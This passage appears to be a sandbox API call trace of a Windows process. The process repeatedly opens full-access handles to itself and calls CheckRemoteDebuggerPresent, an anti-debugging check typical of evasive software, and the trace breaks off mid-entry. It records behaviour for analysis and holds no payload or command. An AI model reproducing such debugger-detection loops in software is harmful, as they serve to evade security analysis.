GetCurrentProcessId () returned 0x678 [0175.231] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x450 [0175.231] GetExitCodeProcess (in: hProcess=0x450, lpExitCode=0x2267a8c | out: lpExitCode=0x2267a8c*=0x103) returned 1 [0175.231] CheckRemoteDebuggerPresent (in: hProcess=0x450, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.231] GetCurrentProcessId () returned 0x678 [0175.231] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x454 [0175.231] GetExitCodeProcess (in: hProcess=0x454, lpExitCode=0x2267b44 | out: lpExitCode=0x2267b44*=0x103) returned 1 [0175.231] CheckRemoteDebuggerPresent (in: hProcess=0x454, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.232] GetCurrentProcessId () returned 0x678 [0175.232] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x458 [0175.232] GetExitCodeProcess (in: hProcess=0x458, lpExitCode=0x2267bfc | out: lpExitCode=0x2267bfc*=0x103) returned 1 [0175.232] CheckRemoteDebuggerPresent (in: hProcess=0x458, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.232] GetCurrentProcessId () returned 0x678 [0175.232] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x45c [0175.232] GetExitCodeProcess (in: hProcess=0x45c, lpExitCode=0x2267cb4 | out: lpExitCode=0x2267cb4*=0x103) returned 1 [0175.232] CheckRemoteDebuggerPresent (in: hProcess=0x45c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.232] GetCurrentProcessId () returned 0x678 [0175.232] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x460 [0175.232] GetExitCodeProcess (in: hProcess=0x460, lpExitCode=0x2267d6c | out: lpExitCode=0x2267d6c*=0x103) returned 1 [0175.232] CheckRemoteDebuggerPresent (in: hProcess=0x460, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.232] GetCurrentProcessId () returned 0x678 [0175.232] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x464 [0175.232] GetExitCodeProcess (in: hProcess=0x464, lpExitCode=0x2267e24 | out: lpExitCode=0x2267e24*=0x103) returned 1 [0175.233] CheckRemoteDebuggerPresent (in: hProcess=0x464, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.233] GetCurrentProcessId () returned 0x678 [0175.233] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x468 [0175.233] GetExitCodeProcess (in: hProcess=0x468, lpExitCode=0x2267edc | out: lpExitCode=0x2267edc*=0x103) returned 1 [0175.233] CheckRemoteDebuggerPresent (in: hProcess=0x468, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.233] GetCurrentProcessId () returned 0x678 [0175.233] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x46c [0175.233] GetExitCodeProcess (in: hProcess=0x46c, lpExitCode=0x2267f94 | out: lpExitCode=0x2267f94*=0x103) returned 1 [0175.233] CheckRemoteDebuggerPresent (in: hProcess=0x46c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.233] GetCurrentProcessId () returned 0x678 [0175.233] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x470 [0175.233] GetExitCodeProcess (in: hProcess=0x470, lpExitCode=0x226804c | out: lpExitCode=0x226804c*=0x103) returned 1 [0175.233] CheckRemoteDebuggerPresent (in: hProcess=0x470, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.233] GetCurrentProcessId () returned 0x678 [0175.233] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x474 [0175.233] GetExitCodeProcess (in: hProcess=0x474, lpExitCode=0x2268104 | out: lpExitCode=0x2268104*=0x103) returned 1 [0175.233] CheckRemoteDebuggerPresent (in: hProcess=0x474, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.234] GetCurrentProcessId () returned 0x678 [0175.234] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x478 [0175.234] GetExitCodeProcess (in: hProcess=0x478, lpExitCode=0x22681bc | out: lpExitCode=0x22681bc*=0x103) returned 1 [0175.234] CheckRemoteDebuggerPresent (in: hProcess=0x478, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.234] GetCurrentProcessId () returned 0x678 [0175.234] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x47c [0175.234] GetExitCodeProcess (in: hProcess=0x47c, lpExitCode=0x2268274 | out: lpExitCode=0x2268274*=0x103) returned 1 [0175.234] CheckRemoteDebuggerPresent (in: hProcess=0x47c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.234] GetCurrentProcessId () returned 0x678 [0175.234] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x480 [0175.234] GetExitCodeProcess (in: hProcess=0x480, lpExitCode=0x2268358 | out: lpExitCode=0x2268358*=0x103) returned 1 [0175.234] CheckRemoteDebuggerPresent (in: hProcess=0x480, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.234] GetCurrentProcessId () returned 0x678 [0175.234] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x484 [0175.234] GetExitCodeProcess (in: hProcess=0x484, lpExitCode=0x2268410 | out: lpExitCode=0x2268410*=0x103) returned 1 [0175.235] CheckRemoteDebuggerPresent (in: hProcess=0x484, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.235] GetCurrentProcessId () returned 0x678 [0175.235] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x488 [0175.235] GetExitCodeProcess (in: hProcess=0x488, lpExitCode=0x22684c8 | out: lpExitCode=0x22684c8*=0x103) returned 1 [0175.235] CheckRemoteDebuggerPresent (in: hProcess=0x488, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.235] GetCurrentProcessId () returned 0x678 [0175.235] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x48c [0175.235] GetExitCodeProcess (in: hProcess=0x48c, lpExitCode=0x2268580 | out: lpExitCode=0x2268580*=0x103) returned 1 [0175.235] CheckRemoteDebuggerPresent (in: hProcess=0x48c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.236] GetExitCodeProcess (in: hProcess=0x490, lpExitCode=0x2268638 | out: lpExitCode=0x2268638*=0x103) returned 1 [0175.236] CheckRemoteDebuggerPresent (in: hProcess=0x490, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.236] GetExitCodeProcess (in: hProcess=0x494, lpExitCode=0x22686f0 | out: lpExitCode=0x22686f0*=0x103) returned 1 [0175.236] CheckRemoteDebuggerPresent (in: hProcess=0x494, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.236] GetExitCodeProcess (in: hProcess=0x498, lpExitCode=0x22687a8 | out: lpExitCode=0x22687a8*=0x103) returned 1 [0175.236] CheckRemoteDebuggerPresent (in: hProcess=0x498, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.236] GetExitCodeProcess (in: hProcess=0x49c, lpExitCode=0x2268860 | out: lpExitCode=0x2268860*=0x103) returned 1 [0175.236] CheckRemoteDebuggerPresent (in: hProcess=0x49c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.237] GetExitCodeProcess (in: hProcess=0x4a0, lpExitCode=0x2268918 | out: lpExitCode=0x2268918*=0x103) returned 1 [0175.237] CheckRemoteDebuggerPresent (in: hProcess=0x4a0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.237] GetExitCodeProcess (in: hProcess=0x4a4, lpExitCode=0x22689d0 | out: lpExitCode=0x22689d0*=0x103) returned 1 [0175.237] CheckRemoteDebuggerPresent (in: hProcess=0x4a4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.237] GetExitCodeProcess (in: hProcess=0x4a8, lpExitCode=0x2268a88 | out: lpExitCode=0x2268a88*=0x103) returned 1 [0175.237] CheckRemoteDebuggerPresent (in: hProcess=0x4a8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.237] GetExitCodeProcess (in: hProcess=0x4ac, lpExitCode=0x2268b40 | out: lpExitCode=0x2268b40*=0x103) returned 1 [0175.237] CheckRemoteDebuggerPresent (in: hProcess=0x4ac, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.237] GetExitCodeProcess (in: hProcess=0x4b0, lpExitCode=0x2268bf8 | out: lpExitCode=0x2268bf8*=0x103) returned 1 [0175.237] CheckRemoteDebuggerPresent (in: hProcess=0x4b0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.237] GetExitCodeProcess (in: hProcess=0x4b4, lpExitCode=0x2268cb0 | out: lpExitCode=0x2268cb0*=0x103) returned 1 [0175.237] CheckRemoteDebuggerPresent (in: hProcess=0x4b4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.238] GetExitCodeProcess (in: hProcess=0x4b8, lpExitCode=0x2268d68 | out: lpExitCode=0x2268d68*=0x103) returned 1 [0175.238] CheckRemoteDebuggerPresent (in: hProcess=0x4b8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.238] GetExitCodeProcess (in: hProcess=0x4bc, lpExitCode=0x2268e20 | out: lpExitCode=0x2268e20*=0x103) returned 1 [0175.238] CheckRemoteDebuggerPresent (in: hProcess=0x4bc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.238] GetExitCodeProcess (in: hProcess=0x4c0, lpExitCode=0x2268ed8 | out: lpExitCode=0x2268ed8*=0x103) returned 1 [0175.238] CheckRemoteDebuggerPresent (in: hProcess=0x4c0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.238] GetExitCodeProcess (in: hProcess=0x4c4, lpExitCode=0x2268f90 | out: lpExitCode=0x2268f90*=0x103) returned 1 [0175.238] CheckRemoteDebuggerPresent (in: hProcess=0x4c4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.238] GetExitCodeProcess (in: hProcess=0x4c8, lpExitCode=0x2269048 | out: lpExitCode=0x2269048*=0x103) returned 1 [0175.238] CheckRemoteDebuggerPresent (in: hProcess=0x4c8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.238] GetExitCodeProcess (in: hProcess=0x4cc, lpExitCode=0x2269100 | out: lpExitCode=0x2269100*=0x103) returned 1 [0175.239] CheckRemoteDebuggerPresent (in: hProcess=0x4cc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.239] GetExitCodeProcess (in: hProcess=0x4d0, lpExitCode=0x22691b8 | out: lpExitCode=0x22691b8*=0x103) returned 1 [0175.239] CheckRemoteDebuggerPresent (in: hProcess=0x4d0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.239] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x4d4 [0175.239] GetExitCodeProcess (in: hProcess=0x4d4, lpExitCode=0x2269270 | out: lpExitCode=0x2269270*=0x103) returned 1 [0175.239] CheckRemoteDebuggerPresent (in: hProcess=0x4d4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.239] GetExitCodeProcess (in: hProcess=0x4d8, lpExitCode=0x2269328 | out: lpExitCode=0x2269328*=0x103) returned 1 [0175.239] CheckRemoteDebuggerPresent (in: hProcess=0x4d8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.239] GetExitCodeProcess (in: hProcess=0x4dc, lpExitCode=0x22693e0 | out: lpExitCode=0x22693e0*=0x103) returned 1 [0175.239] CheckRemoteDebuggerPresent (in: hProcess=0x4dc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.239] GetExitCodeProcess (in: hProcess=0x4e0, lpExitCode=0x2269498 | out: lpExitCode=0x2269498*=0x103) returned 1 [0175.240] CheckRemoteDebuggerPresent (in: hProcess=0x4e0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.240] GetExitCodeProcess (in: hProcess=0x4e4, lpExitCode=0x2269550 | out: lpExitCode=0x2269550*=0x103) returned 1 [0175.240] CheckRemoteDebuggerPresent (in: hProcess=0x4e4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.240] GetExitCodeProcess (in: hProcess=0x4e8, lpExitCode=0x2269608 | out: lpExitCode=0x2269608*=0x103) returned 1 [0175.240] CheckRemoteDebuggerPresent (in: hProcess=0x4e8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.240] GetExitCodeProcess (in: hProcess=0x4ec, lpExitCode=0x22696c0 | out: lpExitCode=0x22696c0*=0x103) returned 1 [0175.240] CheckRemoteDebuggerPresent (in: hProcess=0x4ec, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.240] GetExitCodeProcess (in: hProcess=0x4f0, lpExitCode=0x2269778 | out: lpExitCode=0x2269778*=0x103) returned 1 [0175.240] CheckRemoteDebuggerPresent (in: hProcess=0x4f0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.240] GetExitCodeProcess (in: hProcess=0x4f4, lpExitCode=0x2269830 | out: lpExitCode=0x2269830*=0x103) returned 1 [0175.240] CheckRemoteDebuggerPresent (in: hProcess=0x4f4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.241] GetExitCodeProcess (in: hProcess=0x4f8, lpExitCode=0x22698e8 | out: lpExitCode=0x22698e8*=0x103) returned 1 [0175.241] CheckRemoteDebuggerPresent (in: hProcess=0x4f8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.241] GetExitCodeProcess (in: hProcess=0x4fc, lpExitCode=0x22699a0 | out: lpExitCode=0x22699a0*=0x103) returned 1 [0175.241] CheckRemoteDebuggerPresent (in: hProcess=0x4fc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.241] GetExitCodeProcess (in: hProcess=0x500, lpExitCode=0x2269a58 | out: lpExitCode=0x2269a58*=0x103) returned 1 [0175.241] CheckRemoteDebuggerPresent (in: hProcess=0x500, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.241] GetExitCodeProcess (in: hProcess=0x504, lpExitCode=0x2269b10 | out: lpExitCode=0x2269b10*=0x103) returned 1 [0175.241] CheckRemoteDebuggerPresent (in: hProcess=0x504, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.241] GetExitCodeProcess (in: hProcess=0x508, lpExitCode=0x2269bc8 | out: lpExitCode=0x2269bc8*=0x103) returned 1 [0175.241] CheckRemoteDebuggerPresent (in: hProcess=0x508, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.241] GetExitCodeProcess (in: hProcess=0x50c, lpExitCode=0x2269c80 | out: lpExitCode=0x2269c80*=0x103) returned 1 [0175.242] CheckRemoteDebuggerPresent (in: hProcess=0x50c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.242] GetExitCodeProcess (in: hProcess=0x510, lpExitCode=0x2269d38 | out: lpExitCode=0x2269d38*=0x103) returned 1 [0175.242] CheckRemoteDebuggerPresent (in: hProcess=0x510, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.242] GetExitCodeProcess (in: hProcess=0x514, lpExitCode=0x2269df0 | out: lpExitCode=0x2269df0*=0x103) returned 1 [0175.242] CheckRemoteDebuggerPresent (in: hProcess=0x514, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.242] GetExitCodeProcess (in: hProcess=0x518, lpExitCode=0x2269ea8 | out: lpExitCode=0x2269ea8*=0x103) returned 1 [0175.242] CheckRemoteDebuggerPresent (in: hProcess=0x518, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.242] GetExitCodeProcess (in: hProcess=0x51c, lpExitCode=0x2269f60 | out: lpExitCode=0x2269f60*=0x103) returned 1 [0175.242] CheckRemoteDebuggerPresent (in: hProcess=0x51c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.242] GetExitCodeProcess (in: hProcess=0x520, lpExitCode=0x226a018 | out: lpExitCode=0x226a018*=0x103) returned 1 [0175.242] CheckRemoteDebuggerPresent (in: hProcess=0x520, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.243] GetExitCodeProcess (in: hProcess=0x524, lpExitCode=0x226a0d0 | out: lpExitCode=0x226a0d0*=0x103) returned 1 [0175.243] CheckRemoteDebuggerPresent (in: hProcess=0x524, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.243] GetExitCodeProcess (in: hProcess=0x528, lpExitCode=0x226a188 | out: lpExitCode=0x226a188*=0x103) returned 1 [0175.243] CheckRemoteDebuggerPresent (in: hProcess=0x528, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.243] GetExitCodeProcess (in: hProcess=0x52c, lpExitCode=0x226a240 | out: lpExitCode=0x226a240*=0x103) returned 1 [0175.243] CheckRemoteDebuggerPresent (in: hProcess=0x52c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.243] GetCurrentProcessId () returned 0x678 [0175.243] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x530 [0175.243] GetExitCodeProcess (in: hProcess=0x530, lpExitCode=0x226a2f8 | out: lpExitCode=0x226a2f8*=0x103) returned 1 [0175.243] CheckRemoteDebuggerPresent (in: hProcess=0x530, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.243] GetExitCodeProcess (in: hProcess=0x534, lpExitCode=0x226a3b0 | out: lpExitCode=0x226a3b0*=0x103) returned 1 [0175.244] CheckRemoteDebuggerPresent (in: hProcess=0x534, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.244] GetExitCodeProcess (in: hProcess=0x538, lpExitCode=0x226a468 | out: lpExitCode=0x226a468*=0x103) returned 1 [0175.244] CheckRemoteDebuggerPresent (in: hProcess=0x538, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.244] GetExitCodeProcess (in: hProcess=0x53c, lpExitCode=0x226a520 | out: lpExitCode=0x226a520*=0x103) returned 1 [0175.244] CheckRemoteDebuggerPresent (in: hProcess=0x53c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.244] GetExitCodeProcess (in: hProcess=0x540, lpExitCode=0x226a5d8 | out: lpExitCode=0x226a5d8*=0x103) returned 1 [0175.244] CheckRemoteDebuggerPresent (in: hProcess=0x540, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.244] GetExitCodeProcess (in: hProcess=0x544, lpExitCode=0x226a690 | out: lpExitCode=0x226a690*=0x103) returned 1 [0175.244] CheckRemoteDebuggerPresent (in: hProcess=0x544, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.244] GetExitCodeProcess (in: hProcess=0x548, lpExitCode=0x226a748 | out: lpExitCode=0x226a748*=0x103) returned 1 [0175.244] CheckRemoteDebuggerPresent (in: hProcess=0x548, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.244] GetExitCodeProcess (in: hProcess=0x54c, lpExitCode=0x226a800 | out: lpExitCode=0x226a800*=0x103) returned 1 [0175.245] CheckRemoteDebuggerPresent (in: hProcess=0x54c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.245] GetExitCodeProcess (in: hProcess=0x550, lpExitCode=0x226a8b8 | out: lpExitCode=0x226a8b8*=0x103) returned 1 [0175.245] CheckRemoteDebuggerPresent (in: hProcess=0x550, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.245] GetExitCodeProcess (in: hProcess=0x554, lpExitCode=0x226a970 | out: lpExitCode=0x226a970*=0x103) returned 1 [0175.245] CheckRemoteDebuggerPresent (in: hProcess=0x554, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.245] GetExitCodeProcess (in: hProcess=0x558, lpExitCode=0x226aa28 | out: lpExitCode=0x226aa28*=0x103) returned 1 [0175.245] CheckRemoteDebuggerPresent (in: hProcess=0x558, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.245] GetExitCodeProcess (in: hProcess=0x55c, lpExitCode=0x226aae0 | out: lpExitCode=0x226aae0*=0x103) returned 1 [0175.245] CheckRemoteDebuggerPresent (in: hProcess=0x55c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.245] GetExitCodeProcess (in: hProcess=0x560, lpExitCode=0x226ab98 | out: lpExitCode=0x226ab98*=0x103) returned 1 [0175.245] CheckRemoteDebuggerPresent (in: hProcess=0x560, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.246] GetCurrentProcessId () returned 0x678 [0175.246] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x564 [0175.246] GetExitCodeProcess (in: hProcess=0x564, lpExitCode=0x226ac50 | out: lpExitCode=0x226ac50*=0x103) returned 1 [0175.246] CheckRemoteDebuggerPresent (in: hProcess=0x564, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.246] GetExitCodeProcess (in: hProcess=0x568, lpExitCode=0x226ad08 | out: lpExitCode=0x226ad08*=0x103) returned 1 [0175.246] CheckRemoteDebuggerPresent (in: hProcess=0x568, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.246] GetExitCodeProcess (in: hProcess=0x56c, lpExitCode=0x226adc0 | out: lpExitCode=0x226adc0*=0x103) returned 1 [0175.246] CheckRemoteDebuggerPresent (in: hProcess=0x56c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.246] GetExitCodeProcess (in: hProcess=0x570, lpExitCode=0x226ae78 | out: lpExitCode=0x226ae78*=0x103) returned 1 [0175.246] CheckRemoteDebuggerPresent (in: hProcess=0x570, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.246] GetExitCodeProcess (in: hProcess=0x574, lpExitCode=0x226af30 | out: lpExitCode=0x226af30*=0x103) returned 1 [0175.247] CheckRemoteDebuggerPresent (in: hProcess=0x574, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.247] GetExitCodeProcess (in: hProcess=0x578, lpExitCode=0x226afe8 | out: lpExitCode=0x226afe8*=0x103) returned 1 [0175.247] CheckRemoteDebuggerPresent (in: hProcess=0x578, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.247] GetExitCodeProcess (in: hProcess=0x57c, lpExitCode=0x226b0a0 | out: lpExitCode=0x226b0a0*=0x103) returned 1 [0175.247] CheckRemoteDebuggerPresent (in: hProcess=0x57c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.247] GetExitCodeProcess (in: hProcess=0x580, lpExitCode=0x226b158 | out: lpExitCode=0x226b158*=0x103) returned 1 [0175.247] CheckRemoteDebuggerPresent (in: hProcess=0x580, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.247] GetExitCodeProcess (in: hProcess=0x584, lpExitCode=0x226b210 | out: lpExitCode=0x226b210*=0x103) returned 1 [0175.247] CheckRemoteDebuggerPresent (in: hProcess=0x584, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.247] GetExitCodeProcess (in: hProcess=0x588, lpExitCode=0x226b2c8 | out: lpExitCode=0x226b2c8*=0x103) returned 1 [0175.247] CheckRemoteDebuggerPresent (in: hProcess=0x588, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.248] GetExitCodeProcess (in: hProcess=0x58c, lpExitCode=0x226b380 | out: lpExitCode=0x226b380*=0x103) returned 1 [0175.248] CheckRemoteDebuggerPresent (in: hProcess=0x58c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.248] GetExitCodeProcess (in: hProcess=0x590, lpExitCode=0x226b438 | out: lpExitCode=0x226b438*=0x103) returned 1 [0175.248] CheckRemoteDebuggerPresent (in: hProcess=0x590, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.248] GetExitCodeProcess (in: hProcess=0x594, lpExitCode=0x226b4f0 | out: lpExitCode=0x226b4f0*=0x103) returned 1 [0175.248] CheckRemoteDebuggerPresent (in: hProcess=0x594, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.248] GetExitCodeProcess (in: hProcess=0x598, lpExitCode=0x226b5a8 | out: lpExitCode=0x226b5a8*=0x103) returned 1 [0175.248] CheckRemoteDebuggerPresent (in: hProcess=0x598, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.248] GetExitCodeProcess (in: hProcess=0x59c, lpExitCode=0x226b660 | out: lpExitCode=0x226b660*=0x103) returned 1 [0175.248] CheckRemoteDebuggerPresent (in: hProcess=0x59c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.248] GetExitCodeProcess (in: hProcess=0x5a0, lpExitCode=0x226b718 | out: lpExitCode=0x226b718*=0x103) returned 1 [0175.248] CheckRemoteDebuggerPresent (in: hProcess=0x5a0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.249] GetExitCodeProcess (in: hProcess=0x5a4, lpExitCode=0x226b7d0 | out: lpExitCode=0x226b7d0*=0x103) returned 1 [0175.249] CheckRemoteDebuggerPresent (in: hProcess=0x5a4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.249] GetExitCodeProcess (in: hProcess=0x5a8, lpExitCode=0x226b888 | out: lpExitCode=0x226b888*=0x103) returned 1 [0175.249] CheckRemoteDebuggerPresent (in: hProcess=0x5a8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.249] GetExitCodeProcess (in: hProcess=0x5ac, lpExitCode=0x226b940 | out: lpExitCode=0x226b940*=0x103) returned 1 [0175.249] CheckRemoteDebuggerPresent (in: hProcess=0x5ac, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.249] GetExitCodeProcess (in: hProcess=0x5b0, lpExitCode=0x226b9f8 | out: lpExitCode=0x226b9f8*=0x103) returned 1 [0175.249] CheckRemoteDebuggerPresent (in: hProcess=0x5b0, pbDebuggerPresent=0x4dd3b0 | out: 